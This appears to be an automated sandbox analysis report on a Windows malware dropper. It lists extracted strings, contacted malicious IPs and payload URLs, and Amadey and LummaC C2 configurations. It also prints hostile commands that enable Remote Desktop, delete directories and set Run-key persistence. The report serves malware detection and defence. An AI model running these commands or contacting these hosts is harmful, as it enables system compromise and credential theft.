S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006AEB78 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		2_2_006AEB78
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006ADE81 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		2_2_006ADE81

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
176.113.115.7	unknown	Russian Federation	49505	SELECTELRU	true
176.113.115.6	unknown	Russian Federation	49505	SELECTELRU	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
weldorae.digital/geds	true	Avira URL Cloud: malware	unknown
oreheatq.live/gsopp	true	Avira URL Cloud: malware	unknown
steelixr.live/aguiz	true	Avira URL Cloud: malware	unknown
http://176.113.115.7/files/martin1/martin.zip	true	Avira URL Cloud: phishing	unknown
smeltingt.run/giiaus	true	Avira URL Cloud: malware	unknown
castmaxw.run/ganzde	true	Avira URL Cloud: malware	unknown
galarona.bet/GKAns	true	Avira URL Cloud: malware	unknown
targett.top/dsANGt	false		high
http://176.113.115.7/mine/random.exe	false		high
http://176.113.115.7/files/newdef/apple.exe	true	Avira URL Cloud: malware	unknown
http://176.113.115.7/files/6150344932/39pazbF.exe	true	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.php	false		high
http://176.113.115.7/files/7708303768/xZRvIQ5.exe	true	Avira URL Cloud: safe	unknown
http://176.113.115.7/files/7001656225/Rm3cVPI.exe	true	Avira URL Cloud: phishing	unknown
http://176.113.115.6/Ni9kiput/index.php	false		high
ferromny.digital/gwpd	true	Avira URL Cloud: malware	unknown
advennture.top/GKsiio	false		high
http://176.113.115.7/files/5876083921/Or1ARiR.exe	true	Avira URL Cloud: phishing	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SUAosT64HD.exe

Avira: detected

Antivirus detection for URL or domain

Source: weldorae.digital/geds	Avira URL Cloud: Label: malware
Source: oreheatq.live/gsopp	Avira URL Cloud: Label: malware
Source: steelixr.live/aguiz	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/martin1/martin.zip	Avira URL Cloud: Label: phishing
Source: smeltingt.run/giiaus	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php#w	Avira URL Cloud: Label: malware
Source: castmaxw.run/ganzde	Avira URL Cloud: Label: malware
Source: galarona.bet/GKAns	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/newdef/apple.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/5876083921/Or1ARiR.exe	Avira URL Cloud: Label: phishing
Source: http://176.113.115.7/files/7001656225/Rm3cVPI.exe	Avira URL Cloud: Label: phishing
Source: ferromny.digital/gwpd	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	Avira: detection malicious, Label: HEUR/AGEN.1361736
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1361736
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\ssisd.sys	Avira: detection malicious, Label: HEUR/AGEN.1350862
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["galarona.bet/GKAns", "oreheatq.live/gsopp", "castmaxw.run/ganzde", "weldorae.digital/geds", "steelixr.live/aguiz", "advennture.top/GKsiio", "targett.top/dsANGt", "smeltingt.run/giiaus", "ferromny.digital/gwpd"], "Build id": "d250578b335fbbce73b510aa5accebc066be54418f8bcf75cd"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\22.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\ssisd.sys	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: SUAosT64HD.exe	ReversingLabs: Detection: 73%
Source: SUAosT64HD.exe	Virustotal: Detection: 77%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.5%

Sample uses string decryption to hide its real strings

Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 185.215.113.16
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Jo89Ku7d/index.php
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 44111dbc49
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: axplong.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: http://
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: https://
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Panda Security
